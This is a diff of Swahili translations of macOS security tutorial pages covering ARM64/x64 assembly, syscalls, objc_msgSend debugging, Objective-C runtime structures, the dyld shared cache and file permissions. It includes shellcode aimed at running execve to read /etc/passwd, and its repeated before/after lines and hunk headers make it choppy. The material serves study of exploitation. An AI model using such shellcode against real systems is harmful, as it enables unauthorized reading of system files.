Kwa mfano, amri **`UADD8`** **inaongeza jozi nne za bytes** (kutoka kwa operandi mbili za 32-bit) kwa pamoja na kuhifadhi matokeo katika register ya 32-bit. Kisha **inaweka bendera `GE` katika `APSR`** kulingana na matokeo haya. Kila bendera ya GE inahusiana na moja ya nyongeza za byte, ikionyesha ikiwa nyongeza ya jozi hiyo ya byte **ilivuka**.
Kwa mfano, amri **`UADD8`** **inaongeza jozi nne za bytes** (kutoka kwa operandi mbili za 32-bit) kwa pamoja na kuhifadhi matokeo katika register ya 32-bit. Kisha **inaweka bendera `GE` katika `APSR`** kulingana na matokeo haya. Kila bendera ya GE inahusiana na moja ya nyongeza za byte, ikionyesha ikiwa nyongeza ya jozi hiyo ya byte **ilivuka mipaka**.
Amri **`SEL`** inatumia bendera hizi za GE kufanya vitendo vya masharti.
@ -301,7 +301,7 @@ Amri **`SEL`** inatumia bendera hizi za GE kufanya vitendo vya masharti.
- Bits **`J`** na **`T`**: **`J`** inapaswa kuwa 0 na ikiwa **`T`** ni 0 seti ya amri A32 inatumika, na ikiwa ni 1, T32 inatumika.
- **IT Block State Register** (`ITSTATE`): Hizi ni bits kutoka 10-15 na 25-26. Zinahifadhi hali za masharti kwa amri ndani ya kundi lililo na **`IT`**.
- Bit **`E`**: Inaonyesha **endianness**.
- **Mode and Exception Mask Bits** (0-4): Zinabainisha hali ya sasa ya utekelezaji. **Ya 5** inaonyesha ikiwa programu inafanya kazi kama 32bit (1) au 64bit (0). Nyingine 4 zinaonyesha **hali ya kosa inayotumika sasa** (wakati kosa linapotokea na linashughulikiwa). Nambari iliyowekwa **inaonyesha kipaumbele cha sasa** ikiwa kosa lingine litachochewa wakati huu unashughulikiwa.
- **Mode and Exception Mask Bits** (0-4): Zinabainisha hali ya sasa ya utekelezaji. **Ya 5** inaonyesha ikiwa programu inafanya kazi kama 32bit (1) au 64bit (0). Nyingine 4 zinaonyesha **hali ya kosa inayotumika sasa** (wakati kosa linapotokea na linashughulikiwa). Nambari iliyowekwa **inaonyesha kipaumbele cha sasa** endapo kosa lingine litachochewa wakati huu unashughulikiwa.
<figure><img src="../../../images/image (1200).png" alt=""><figcaption></figcaption></figure>
@ -328,15 +328,15 @@ dyldex -e libsystem_kernel.dylib /System/Library/Caches/com.apple.dyld/dyld_shar
Kumbuka kwamba **Ida** na **Ghidra** zinaweza pia ku-decompile **dylibs maalum** kutoka kwenye cache kwa kupitisha tu cache.
> [!TIP]
> Wakati mwingine ni rahisi kuangalia **code iliyodecompiled** kutoka **`libsystem_kernel.dylib`** **kuliko** kuangalia **source code** kwa sababu code ya syscalls kadhaa (BSD na Mach) inazalishwa kupitia scripts (angalia maoni katika source code) wakati katika dylib unaweza kupata kile kinachoitwa.
> Wakati mwingine ni rahisi kuangalia **decompiled** code kutoka **`libsystem_kernel.dylib`** **kuliko** kuangalia **source code** kwa sababu code ya syscalls kadhaa (BSD na Mach) inazalishwa kupitia scripts (angalia maoni katika source code) wakati katika dylib unaweza kupata kile kinachoitwa.
### machdep calls
XNU inasaidia aina nyingine ya calls inayoitwa machine dependent. Idadi ya calls hizi inategemea usanifu na wala calls wala idadi hazihakikishiwi kubaki kuwa thabiti.
XNU inasaidia aina nyingine ya calls inayoitwa machine dependent. Nambari za calls hizi zinategemea usanifu na wala calls au nambari hazihakikishiwi kubaki kuwa thabiti.
### comm page
Hii ni ukurasa wa kumbukumbu wa mmiliki wa kernel ambao umewekwa kwenye anwani ya kila mchakato wa mtumiaji. Imepangwa kufanya mpito kutoka kwa hali ya mtumiaji hadi nafasi ya kernel kuwa haraka zaidi kuliko kutumia syscalls kwa huduma za kernel ambazo zinatumika sana kwamba mpito huu ungekuwa usio na ufanisi.
Hii ni ukurasa wa kumbukumbu wa mmiliki wa kernel ambao umewekwa kwenye anwani ya kila mchakato wa mtumiaji. Imepangwa kufanya mpito kutoka kwa hali ya mtumiaji hadi nafasi ya kernel kuwa haraka kuliko kutumia syscalls kwa huduma za kernel ambazo zinatumika sana kwamba mpito huu ungekuwa usio na ufanisi.
Kwa mfano, wito wa `gettimeofdate` unasoma thamani ya `timeval` moja kwa moja kutoka kwenye comm page.
@ -350,7 +350,7 @@ Parameta ([maelezo zaidi katika docs](https://developer.apple.com/documentation/
- x1: op -> Mchaguo wa njia
- x2... -> Mabaki ya hoja za njia iliyoitwa
Hivyo, ikiwa utaweka breakpoint kabla ya tawi la kazi hii, unaweza kwa urahisi kupata kile kinachoitwa katika lldb (katika mfano huu, kitu kinaita kitu kutoka `NSConcreteTask` ambacho kitakimbiza amri):
Hivyo, ikiwa utaweka breakpoint kabla ya tawi la kazi hii, unaweza kwa urahisi kupata kile kinachoitwa katika lldb (katika mfano huu, kitu kinaita kitu kutoka `NSConcreteTask` ambacho kitakimbia amri):
```bash
# Right in the line were objc_msgSend will be called
(lldb) po $x0
@ -369,17 +369,17 @@ whoami
)
```
> [!TIP]
> Kuweka mabadiliko ya mazingira **`NSObjCMessageLoggingEnabled=1`** inawezekana kurekodi wakati kazi hii inaitwa katika faili kama `/tmp/msgSends-pid`.
> Kuweka variable ya env **`NSObjCMessageLoggingEnabled=1`** inawezekana kuandika wakati kazi hii inaitwa katika faili kama `/tmp/msgSends-pid`.
>
> Zaidi ya hayo, kuweka **`OBJC_HELP=1`** na kuita binary yoyote unaweza kuona mabadiliko mengine ya mazingira ambayo unaweza kutumia ili **log** wakati vitendo fulani vya Objc-C vinapotokea.
> Zaidi ya hayo, kuweka **`OBJC_HELP=1`** na kuita binary yoyote unaweza kuona variable nyingine za mazingira ambazo unaweza kutumia ku **log** wakati vitendo fulani vya Objc-C vinatokea.
Wakati kazi hii inaitwa, inahitajika kupata njia iliyoitwa ya mfano ulioonyeshwa, kwa hili utafutaji tofauti hufanywa:
- Fanya utafutaji wa cache wa matumaini:
- Ikiwa ni mafanikio, imekamilika
- Pata runtimeLock (soma)
- Ikiwa (realize && !cls->realized) tambua darasa
- Ikiwa (initialize && !cls->initialized) anza darasa
- Pata runtimeLock (kusoma)
- Ikiwa (realize && !cls->realized) realize darasa
- Ikiwa (initialize && !cls->initialized) initialize darasa
- Jaribu cache ya darasa lenyewe:
- Ikiwa ni mafanikio, imekamilika
- Jaribu orodha ya mbinu za darasa:
@ -388,8 +388,8 @@ Wakati kazi hii inaitwa, inahitajika kupata njia iliyoitwa ya mfano ulioonyeshwa
- Ikiwa ni mafanikio, imekamilika
- Jaribu orodha ya mbinu za darasa la juu:
- Ikiwa imepatikana, jaza cache na umalize
- Ikiwa (resolver) jaribu mtafutaji wa mbinu, na rudia kutoka kwa utafutaji wa darasa
- Ikiwa bado hapa (= kila kitu kingine kimefeli) jaribu mpelelezi
- Ikiwa (resolver) jaribu mtafutaji wa mbinu, na rudia kutoka utafutaji wa darasa
- Ikiwa bado hapa (= kila kitu kingine kimefeli) jaribu forwarder
### Shellcodes
@ -537,9 +537,9 @@ sh_path: .asciz "/bin/sh"
{{#endtab}}
{{#endtabs}}
#### Soma kwa cat
#### Soma na cat
Lengo ni kutekeleza `execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)`, hivyo hoja ya pili (x1) ni array ya param (ambayo katika kumbukumbu inamaanisha stack ya anwani).
Lengo ni kutekeleza `execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)`, hivyo hoja ya pili (x1) ni array ya params (ambayo katika kumbukumbu inamaanisha stack ya anwani).
```armasm
.section __TEXT,__text ; Begin a new section of type __TEXT and name __text
.global _main ; Declare a global symbol _main

34
src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/introduction-to-x64.md
View File

@ -4,11 +4,11 @@
## **Utangulizi wa x64**
x64, pia inajulikana kama x86-64, ni usanifu wa processor wa bit 64 unaotumika hasa katika kompyuta za mezani na seva. Inatokana na usanifu wa x86 ulioandaliwa na Intel na baadaye kukubaliwa na AMD kwa jina AMD64, ni usanifu unaotumika sana katika kompyuta binafsi na seva leo.
x64, pia inajulikana kama x86-64, ni usanifu wa processor wa 64-bit unaotumika hasa katika kompyuta za mezani na seva. Inatokana na usanifu wa x86 ulioandaliwa na Intel na baadaye kukubaliwa na AMD kwa jina AMD64, ni usanifu unaotumika sana katika kompyuta binafsi na seva leo.
### **Registers**
x64 inapanua usanifu wa x86, ikiwa na **registers 16 za matumizi ya jumla** zilizo na lebo `rax`, `rbx`, `rcx`, `rdx`, `rbp`, `rsp`, `rsi`, `rdi`, na `r8` hadi `r15`. Kila moja ya hizi inaweza kuhifadhi **thamani ya bit 64** (byte 8). Registers hizi pia zina sub-registers za bit 32, 16, na 8 kwa ajili ya ufanisi na kazi maalum.
x64 inapanua usanifu wa x86, ikiwa na **registers 16 za matumizi ya jumla** zilizo na lebo `rax`, `rbx`, `rcx`, `rdx`, `rbp`, `rsp`, `rsi`, `rdi`, na `r8` hadi `r15`. Kila moja ya hizi inaweza kuhifadhi **thamani ya 64-bit** (byte 8). Registers hizi pia zina sub-registers za 32-bit, 16-bit, na 8-bit kwa ajili ya ufanisi na kazi maalum.
1. **`rax`** - Kawaida hutumika kwa **thamani za kurudi** kutoka kwa kazi.
2. **`rbx`** - Mara nyingi hutumika kama **register ya msingi** kwa operesheni za kumbukumbu.
@ -16,17 +16,17 @@ x64 inapanua usanifu wa x86, ikiwa na **registers 16 za matumizi ya jumla** zili
4. **`rdx`** - Hutumika katika majukumu mbalimbali ikiwa ni pamoja na operesheni za hesabu za ziada.
5. **`rbp`** - **Pointer ya msingi** kwa fremu ya stack.
6. **`rsp`** - **Pointer ya stack**, ikifuatilia kilele cha stack.
7. **`rsi`** na **`rdi`** - Hutumika kwa **vyanzo** na **malengo** katika operesheni za nyuzi/kumbukumbu.
7. **`rsi`** na **`rdi`** - Hutumika kwa **vigezo vya chanzo** na **kikundi** katika operesheni za nyuzi/kumbukumbu.
8. **`r8`** hadi **`r15`** - Registers za ziada za matumizi ya jumla zilizoanzishwa katika x64.
### **Mkataba wa Kuita**
Mkataba wa kuita wa x64 unatofautiana kati ya mifumo ya uendeshaji. Kwa mfano:
- **Windows**: Parameta **nne za kwanza** hupitishwa katika registers **`rcx`**, **`rdx`**, **`r8`**, na **`r9`**. Parameta zaidi zinakatwa kwenye stack. Thamani ya kurudi iko katika **`rax`**.
- **System V (inayotumika sana katika mifumo kama UNIX)**: Parameta **sita za kwanza za nambari au pointer** hupitishwa katika registers **`rdi`**, **`rsi`**, **`rdx`**, **`rcx`**, **`r8`**, na **`r9`**. Thamani ya kurudi pia iko katika **`rax`**.
- **Windows**: Vigezo **vinne vya kwanza** vinapitishwa katika registers **`rcx`**, **`rdx`**, **`r8`**, na **`r9`**. Vigezo zaidi vinakatwa kwenye stack. Thamani ya kurudi iko katika **`rax`**.
- **System V (inayotumika sana katika mifumo kama UNIX)**: Vigezo **sita vya kwanza vya nambari au pointer** vinapitishwa katika registers **`rdi`**, **`rsi`**, **`rdx`**, **`rcx`**, **`r8`**, na **`r9`**. Thamani ya kurudi pia iko katika **`rax`**.
Ikiwa kazi ina ingizo zaidi ya sita, **zingine zitapitishwa kwenye stack**. **RSP**, pointer ya stack, inapaswa kuwa **imepangwa kwa byte 16**, ambayo inamaanisha kwamba anwani inayoelekeza inapaswa kugawanywa kwa 16 kabla ya wito wowote kutokea. Hii inamaanisha kwamba kawaida tunahitaji kuhakikisha kuwa RSP imepangwa ipasavyo katika shellcode yetu kabla ya kufanya wito wa kazi. Hata hivyo, katika mazoezi, wito wa mfumo unafanya kazi mara nyingi hata kama hitaji hili halijakidhiwa.
Ikiwa kazi ina zaidi ya ingizo sita, **zingine zitapitishwa kwenye stack**. **RSP**, pointer ya stack, inapaswa kuwa **imepangwa kwa byte 16**, ambayo inamaanisha kwamba anwani inayoelekeza inapaswa kugawanywa kwa 16 kabla ya wito wowote kutokea. Hii inamaanisha kwamba kawaida tunahitaji kuhakikisha kuwa RSP imepangwa ipasavyo katika shellcode yetu kabla ya kufanya wito wa kazi. Hata hivyo, katika mazoezi, wito wa mfumo unafanya kazi mara nyingi hata kama hitaji hili halijakidhi.
### Mkataba wa Kuita katika Swift
@ -43,27 +43,27 @@ Maagizo ya x64 yana seti tajiri, yakihifadhi ufanisi na maagizo ya awali ya x86
- Mfano: `pop rax` — Inachukua thamani ya juu kutoka kwenye stack hadi `rax`.
- **`add`** na **`sub`**: Operesheni za **kujumlisha** na **kuondoa**.
- Mfano: `add rax, rcx` — Inajumlisha thamani katika `rax` na `rcx` ikihifadhi matokeo katika `rax`.
- **`mul`** na **`div`**: Operesheni za **kuzaa** na **ugawaji**. Kumbuka: hizi zina tabia maalum kuhusu matumizi ya operandi.
- **`call`** na **`ret`**: Inatumika ku **ita** na **kurudi kutoka kwa kazi**.
- **`int`**: Inatumika kuanzisha **interrupt** ya programu. Mfano: `int 0x80` ilitumika kwa wito wa mfumo katika 32-bit x86 Linux.
- **`mul`** na **`div`**: Operesheni za **kuongeza** na **kugawanya**. Kumbuka: hizi zina tabia maalum kuhusu matumizi ya operand.
- **`call`** na **`ret`**: Hutumika ku **ita** na **kurudi kutoka kwa kazi**.
- **`int`**: Hutumika kuanzisha **interrupt** ya programu. Mfano, `int 0x80` ilitumika kwa wito wa mfumo katika 32-bit x86 Linux.
- **`cmp`**: **Linganisha** thamani mbili na kuweka bendera za CPU kulingana na matokeo.
- Mfano: `cmp rax, rdx` — Linganisha `rax` na `rdx`.
- **`je`, `jne`, `jl`, `jge`, ...**: Maagizo ya **kuruka kwa masharti** yanayobadilisha mtiririko wa udhibiti kulingana na matokeo ya `cmp` au jaribio la awali.
- Mfano: Baada ya maagizo ya `cmp rax, rdx`, `je label` — Inaruka hadi `label` ikiwa `rax` ni sawa na `rdx`.
- **`syscall`**: Inatumika kwa **wito wa mfumo** katika mifumo mingine ya x64 (kama Unix za kisasa).
- **`sysenter`**: Amri ya **wito wa mfumo** iliyoboreshwa kwenye baadhi ya majukwaa.
- **`syscall`**: Hutumika kwa **wito wa mfumo** katika mifumo mingine ya x64 (kama Unix za kisasa).
- **`sysenter`**: Maagizo ya **wito wa mfumo** yaliyoboreshwa kwenye baadhi ya majukwaa.
### **Prologue ya Kazi**
1. **Sukuma pointer ya msingi ya zamani**: `push rbp` (huhifadhi pointer ya msingi ya mwitishaji)
1. **Push pointer ya msingi ya zamani**: `push rbp` (huhifadhi pointer ya msingi ya mwituni)
2. **Hamisha pointer ya sasa ya stack hadi pointer ya msingi**: `mov rbp, rsp` (inasanifisha pointer mpya ya msingi kwa kazi ya sasa)
3. **Panga nafasi kwenye stack kwa ajili ya mabadiliko ya ndani**: `sub rsp, <size>` (ambapo `<size>` ni idadi ya bytes zinazohitajika)
3. **Panga nafasi kwenye stack kwa ajili ya vigezo vya ndani**: `sub rsp, <size>` (ambapo `<size>` ni idadi ya bytes zinazohitajika)
### **Epilogue ya Kazi**
1. **Hamisha pointer ya sasa ya msingi hadi pointer ya stack**: `mov rsp, rbp` (ondoa mabadiliko ya ndani)
2. **Pop pointer ya msingi ya zamani kutoka kwenye stack**: `pop rbp` (rejesha pointer ya msingi ya mwitishaji)
3. **Rudi**: `ret` (rejesha udhibiti kwa mwitishaji)
1. **Hamisha pointer ya sasa ya msingi hadi pointer ya stack**: `mov rsp, rbp` (ondoa vigezo vya ndani)
2. **Pop pointer ya msingi ya zamani kutoka kwenye stack**: `pop rbp` (rejesha pointer ya msingi ya mwituni)
3. **Rudi**: `ret` (rejesha udhibiti kwa mwituni)
## macOS
@ -209,7 +209,7 @@ syscall
#### Soma na cat
Lengo ni kutekeleza `execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)`, hivyo hoja ya pili (x1) ni array ya paramu (ambayo katika kumbukumbu inamaanisha stack ya anwani).
Lengo ni kutekeleza `execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)`, hivyo hoja ya pili (x1) ni array ya param (ambayo katika kumbukumbu inamaanisha stack ya anwani).
```armasm
bits 64
section .text

8
src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/objects-in-memory.md
View File

@ -72,12 +72,12 @@ Sehemu nyingi za data zinazotumiwa na ObjectiveC runtime zitabadilika wakati wa
- **`__objc_nlcatlist`** (`category_t`): Kielelezo cha Jamii zisizo za Lazy zilizofafanuliwa katika hii binary
- **`__objc_catlist`** (`category_t`): Kielelezo cha Jamii zilizofafanuliwa katika hii binary
- **`__objc_nlclslist`** (`classref_t`): Kielelezo cha Darasa zisizo za Lazy zilizofafanuliwa katika hii binary
- **`__objc_classlist`** (`classref_t`): Viashiria vya darasa zote za Objective-C zilizofafanuliwa katika hii binary
- **`__objc_classlist`** (`classref_t`): Viashiria vya madarasa yote ya Objective-C yaliyofafanuliwa katika hii binary
Inatumia pia sehemu chache katika **`__TEXT`** segment kuhifadhi thamani thabiti ikiwa haiwezekani kuandika katika sehemu hii:
- **`__objc_methname`** (C-String): Majina ya mbinu
- **`__objc_classname`** (C-String): Majina ya darasa
- **`__objc_classname`** (C-String): Majina ya madarasa
- **`__objc_methtype`** (C-String): Aina za mbinu
### Uandishi wa Aina
@ -112,7 +112,7 @@ Uandishi kamili wa aina kwa njia ni:
5. **Kigezo cha pili (`NSDictionary * options`)**: Imeandikwa kama `@`, kwenye ofset 20
6. **Kigezo cha tatu (`NSError ** error`)**: Imeandikwa kama `^@`, kwenye ofset 24
**Kwa mchaguzi + uandishi unaweza kujenga upya njia.**
**Pamoja na mchaguzi + uandishi unaweza kujenga upya njia hiyo.**
### **Darasa**
@ -140,6 +140,6 @@ data()->setFlags(set);
Darasa hili linatumia baadhi ya bits za uwanja wa isa kuonyesha taarifa fulani kuhusu darasa hilo.
Kisha, struct ina kiashiria kwa struct `class_ro_t` kilichohifadhiwa kwenye diski ambacho kina sifa za darasa kama jina lake, mbinu za msingi, mali na mabadiliko ya mfano.\
Wakati wa wakati wa kukimbia, muundo wa ziada `class_rw_t` unatumika ukiwa na viashiria ambavyo vinaweza kubadilishwa kama mbinu, itifaki, mali...
Wakati wa wakati wa kukimbia, muundo wa ziada `class_rw_t` unatumika unao na viashiria ambavyo vinaweza kubadilishwa kama mbinu, itifaki, mali...
{{#include ../../../banners/hacktricks-training.md}}

54
src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md
View File

@ -2,36 +2,36 @@
{{#include ../../../banners/hacktricks-training.md}}
## File hierarchy layout
## Muundo wa Hierarchy ya Faili
- **/Applications**: Programu zilizowekwa zinapaswa kuwa hapa. Watumiaji wote wataweza kuzipata.
- **/bin**: Binaries za mstari wa amri
- **/cores**: Ikiwa ipo, inatumika kuhifadhi core dumps
- **/dev**: Kila kitu kinachukuliwa kama faili hivyo unaweza kuona vifaa vya vifaa vikiwa hapa.
- **/dev**: Kila kitu kinachukuliwa kama faili hivyo unaweza kuona vifaa vya vifaa vilivyohifadhiwa hapa.
- **/etc**: Faili za usanidi
- **/Library**: Maktaba nyingi za ndogo na faili zinazohusiana na mapendeleo, caches na logi zinaweza kupatikana hapa. Folda ya Maktaba ipo kwenye mzizi na kwenye kila directory ya mtumiaji.
- **/private**: Haijandikwa lakini folda nyingi zilizotajwa ni viungo vya alama kwa directory ya kibinafsi.
- **/Library**: Maktaba nyingi za subdirectories na faili zinazohusiana na mapendeleo, caches na logi zinaweza kupatikana hapa. Folda ya Maktaba ipo kwenye mzizi na kwenye kila directory ya mtumiaji.
- **/private**: Haijapangwa lakini folda nyingi zilizotajwa ni viungo vya alama kwa directory ya kibinafsi.
- **/sbin**: Binaries muhimu za mfumo (zinahusiana na usimamizi)
- **/System**: Faili za kufanya OS X ifanye kazi. Unapaswa kupata hasa faili maalum za Apple hapa (sio za wahusika wengine).
- **/tmp**: Faili zinafuta baada ya siku 3 (ni kiungo laini kwa /private/tmp)
- **/Users**: Directory ya nyumbani kwa watumiaji.
- **/usr**: Usanidi na binaries za mfumo
- **/usr**: Config na binaries za mfumo
- **/var**: Faili za logi
- **/Volumes**: Drives zilizowekwa zitakuwa hapa.
- **/.vol**: Ukikimbia `stat a.txt` unapata kitu kama `16777223 7545753 -rw-r--r-- 1 username wheel ...` ambapo nambari ya kwanza ni nambari ya kitambulisho cha volume ambapo faili ipo na ya pili ni nambari ya inode. Unaweza kufikia maudhui ya faili hii kupitia /.vol/ kwa kutumia taarifa hiyo ukikimbia `cat /.vol/16777223/7545753`
### Applications Folders
### Folda za Programu
- **Programu za mfumo** ziko chini ya `/System/Applications`
- **Programu zilizowekwa** kawaida huwekwa katika `/Applications` au katika `~/Applications`
- **Data za programu** zinaweza kupatikana katika `/Library/Application Support` kwa programu zinazokimbia kama root na `~/Library/Application Support` kwa programu zinazokimbia kama mtumiaji.
- Programu za wahusika wengine **daemons** ambazo **zinahitaji kukimbia kama root** kawaida ziko katika `/Library/PrivilegedHelperTools/`
- Programu **Sandboxed** zimepangwa katika folda `~/Library/Containers`. Kila programu ina folda iliyopewa jina kulingana na ID ya bundle ya programu (`com.apple.Safari`).
- Programu **Sandboxed** zimepangwa katika folda ya `~/Library/Containers`. Kila programu ina folda iliyopewa jina kulingana na ID ya bundle ya programu (`com.apple.Safari`).
- **Kernel** iko katika `/System/Library/Kernels/kernel`
- **Marekebisho ya kernel ya Apple** yako katika `/System/Library/Extensions`
- **Marekebisho ya kernel ya wahusika wengine** yanahifadhiwa katika `/Library/Extensions`
### Files with Sensitive Information
### Faili zenye Taarifa Nyeti
MacOS inahifadhi taarifa kama nywila katika maeneo kadhaa:
@ -39,15 +39,15 @@ MacOS inahifadhi taarifa kama nywila katika maeneo kadhaa:
macos-sensitive-locations.md
{{#endref}}
### Vulnerable pkg installers
### Wawekezaji wa pkg walio hatarini
{{#ref}}
macos-installers-abuse.md
{{#endref}}
## OS X Specific Extensions
## Marekebisho Maalum ya OS X
- **`.dmg`**: Faili za Apple Disk Image ni za kawaida kwa wawekaji.
- **`.dmg`**: Faili za Apple Disk Image ni za kawaida sana kwa wawekaji.
- **`.kext`**: Inapaswa kufuata muundo maalum na ni toleo la OS X la dereva. (ni bundle)
- **`.plist`**: Pia inajulikana kama orodha ya mali inahifadhi taarifa katika muundo wa XML au binary.
- Inaweza kuwa XML au binary. Zile za binary zinaweza kusomwa kwa:
@ -59,13 +59,13 @@ macos-installers-abuse.md
- **`.app`**: Programu za Apple ambazo zinafuata muundo wa directory (ni bundle).
- **`.dylib`**: Maktaba za dynamic (kama faili za Windows DLL)
- **`.pkg`**: Ni sawa na xar (eXtensible Archive format). Amri ya wawekaji inaweza kutumika kufunga maudhui ya faili hizi.
- **`.DS_Store`**: Faili hii iko kwenye kila directory, inaokoa sifa na marekebisho ya directory.
- **`.DS_Store`**: Faili hii iko kwenye kila directory, inahifadhi sifa na marekebisho ya directory.
- **`.Spotlight-V100`**: Folda hii inaonekana kwenye directory ya mzizi ya kila volume kwenye mfumo.
- **`.metadata_never_index`**: Ikiwa faili hii iko kwenye mzizi wa volume Spotlight haitai index hiyo volume.
- **`.noindex`**: Faili na folda zenye kiambishi hiki hazitakuwa indexed na Spotlight.
- **`.sdef`**: Faili ndani ya bundles zinazoelezea jinsi inavyowezekana kuingiliana na programu kutoka kwa AppleScript.
### macOS Bundles
### Bundles za macOS
Bundle ni **directory** ambayo **inaonekana kama kitu katika Finder** (mfano wa Bundle ni faili za `*.app`).
@ -73,9 +73,9 @@ Bundle ni **directory** ambayo **inaonekana kama kitu katika Finder** (mfano wa
macos-bundles.md
{{#endref}}
## Dyld Shared Library Cache (SLC)
## Cache ya Maktaba ya Dyld (SLC)
Katika macOS (na iOS) maktaba zote za pamoja za mfumo, kama frameworks na dylibs, zime **unganishwa katika faili moja**, inayoitwa **dyld shared cache**. Hii iliboresha utendaji, kwani msimbo unaweza kupakiwa haraka zaidi.
Katika macOS (na iOS) maktaba zote za mfumo zilizoshirikiwa, kama frameworks na dylibs, zime **unganishwa katika faili moja**, inayoitwa **dyld shared cache**. Hii iliboresha utendaji, kwani msimbo unaweza kupakuliwa kwa haraka.
Hii iko katika macOS katika `/System/Volumes/Preboot/Cryptexes/OS/System/Library/dyld/` na katika toleo za zamani unaweza kuweza kupata **shared cache** katika **`/System/Library/dyld/`**.\
Katika iOS unaweza kuzipata katika **`/System/Library/Caches/com.apple.dyld/`**.
@ -100,9 +100,9 @@ dyldex_all [dyld_shared_cache_path] # Extract all
Baadhi ya extractor hazitafanya kazi kwani dylibs zimeunganishwa kwa anwani zilizowekwa kwa hivyo zinaweza kuruka kwenye anwani zisizojulikana.
> [!TIP]
> Pia inawezekana kupakua Cache ya Maktaba ya Shirika la vifaa vingine \*OS katika macos kwa kutumia emulator katika Xcode. Zitawekwa ndani ya: ls `$HOME/Library/Developer/Xcode/<*>OS\ DeviceSupport/<version>/Symbols/System/Library/Caches/com.apple.dyld/`, kama:`$HOME/Library/Developer/Xcode/iOS\ DeviceSupport/14.1\ (18A8395)/Symbols/System/Library/Caches/com.apple.dyld/dyld_shared_cache_arm64`
> Pia inawezekana kupakua Shared Library Cache ya vifaa vingine \*OS katika macos kwa kutumia emulator katika Xcode. Zitawekwa ndani ya: ls `$HOME/Library/Developer/Xcode/<*>OS\ DeviceSupport/<version>/Symbols/System/Library/Caches/com.apple.dyld/`, kama:`$HOME/Library/Developer/Xcode/iOS\ DeviceSupport/14.1\ (18A8395)/Symbols/System/Library/Caches/com.apple.dyld/dyld_shared_cache_arm64`
### Ramani ya SLC
### Mchoro wa SLC
**`dyld`** inatumia syscall **`shared_region_check_np`** kujua kama SLC imepangwa (ambayo inarudisha anwani) na **`shared_region_map_and_slide_np`** kupanga SLC.
@ -115,13 +115,13 @@ Branch pools ni Mach-O dylibs ndogo ambazo zinaunda nafasi ndogo kati ya ramani
Kwa kutumia mabadiliko ya env:
- **`DYLD_DHARED_REGION=private DYLD_SHARED_CACHE_DIR=</path/dir> DYLD_SHARED_CACHE_DONT_VALIDATE=1`** -> Hii itaruhusu kupakia cache mpya ya maktaba iliyoshirikiwa.
- **`DYLD_SHARED_CACHE_DIR=avoid`** na kubadilisha maktaba kwa mikono kwa symlinks kwa cache iliyoshirikiwa na zile halisi (utahitaji kuzitoa).
- **`DYLD_SHARED_CACHE_DIR=avoid`** na kubadilisha maktaba kwa mikono na symlinks kwa cache iliyoshirikiwa na zile halisi (utahitaji kuzitoa).
## Ruhusa Maalum za Faili
### Ruhusa za Folda
Katika **folda**, **kusoma** inaruhusu **kuorodhesha**, **kuandika** inaruhusu **kufuta** na **kuandika** faili ndani yake, na **kutekeleza** inaruhusu **kupita** kwenye directory. Hivyo, kwa mfano, mtumiaji mwenye **ruhusa ya kusoma juu ya faili** ndani ya directory ambapo hana **ruhusa ya kutekeleza** **hataweza kusoma** faili hiyo.
Katika **folda**, **kusoma** inaruhusu **kuorodhesha** hiyo, **kuandika** inaruhusu **kufuta** na **kuandika** faili ndani yake, na **kutekeleza** inaruhusu **kupita** kwenye directory. Hivyo, kwa mfano, mtumiaji mwenye **ruhusa ya kusoma juu ya faili** ndani ya directory ambapo hana **ruhusa ya kutekeleza** **hatakuwa na uwezo wa kusoma** faili hiyo.
### Marekebisho ya Bendera
@ -129,7 +129,7 @@ Kuna bendera kadhaa ambazo zinaweza kuwekwa kwenye faili ambazo zitaifanya faili
- **`uchg`**: Inajulikana kama **uchange** bendera itazuia **kitendo chochote** kubadilisha au kufuta **faili**. Ili kuipatia, fanya: `chflags uchg file.txt`
- Mtumiaji wa root anaweza **kuondoa bendera** na kubadilisha faili.
- **`restricted`**: Bendera hii inafanya faili kuwa **lindwa na SIP** (huwezi kuongeza bendera hii kwenye faili).
- **`restricted`**: Bendera hii inafanya faili kuwa **linda na SIP** (huwezi kuongeza bendera hii kwenye faili).
- **`Sticky bit`**: Ikiwa directory ina sticky bit, **tu** mmiliki wa **directory au root anaweza kubadilisha jina au kufuta** faili. Kawaida hii huwekwa kwenye directory ya /tmp ili kuzuia watumiaji wa kawaida kufuta au kuhamasisha faili za watumiaji wengine.
Bendera zote zinaweza kupatikana katika faili `sys/stat.h` (ipate kwa kutumia `mdfind stat.h | grep stat.h`) na ni:
@ -172,7 +172,7 @@ ls -lde Movies
drwx------+ 7 username staff 224 15 Apr 19:42 Movies
0: group:everyone deny delete
```
Unaweza kupata **faili zote zenye ACLs** kwa kutumia (hii ni polepole sana):
Unaweza kupata **faili zote zenye ACLs** kwa (hii ni polepole sana):
```bash
ls -RAle / 2>/dev/null | grep -E -B1 "\d: "
```
@ -183,7 +183,7 @@ Sifa zilizopanuliwa zina jina na thamani yoyote inayotakiwa, na zinaweza kuoneka
- `com.apple.resourceFork`: Ufanisi wa rasilimali. Pia inaonekana kama `filename/..namedfork/rsrc`
- `com.apple.quarantine`: MacOS: Mekanismu ya karantini ya Gatekeeper (III/6)
- `metadata:*`: MacOS: metadata mbalimbali, kama vile `_backup_excludeItem`, au `kMD*`
- `com.apple.lastuseddate` (#PS): Tarehe ya matumizi ya mwisho ya faili
- `com.apple.lastuseddate` (#PS): Tarehe ya mwisho ya matumizi ya faili
- `com.apple.FinderInfo`: MacOS: Taarifa za Finder (mfano, alama za rangi)
- `com.apple.TextEncoding`: Inabainisha uandishi wa faili za maandiko ya ASCII
- `com.apple.logd.metadata`: Inatumika na logd kwenye faili katika `/var/db/diagnostics`
@ -191,10 +191,10 @@ Sifa zilizopanuliwa zina jina na thamani yoyote inayotakiwa, na zinaweza kuoneka
- `com.apple.rootless`: MacOS: Inatumika na Ulinzi wa Uadilifu wa Mfumo kuweka lebo ya faili (III/10)
- `com.apple.uuidb.boot-uuid`: alama za logd za nyakati za boot zenye UUID ya kipekee
- `com.apple.decmpfs`: MacOS: Usawazishaji wa faili wa uwazi (II/7)
- `com.apple.cprotect`: \*OS: Takwimu za usimbaji wa faili (III/11)
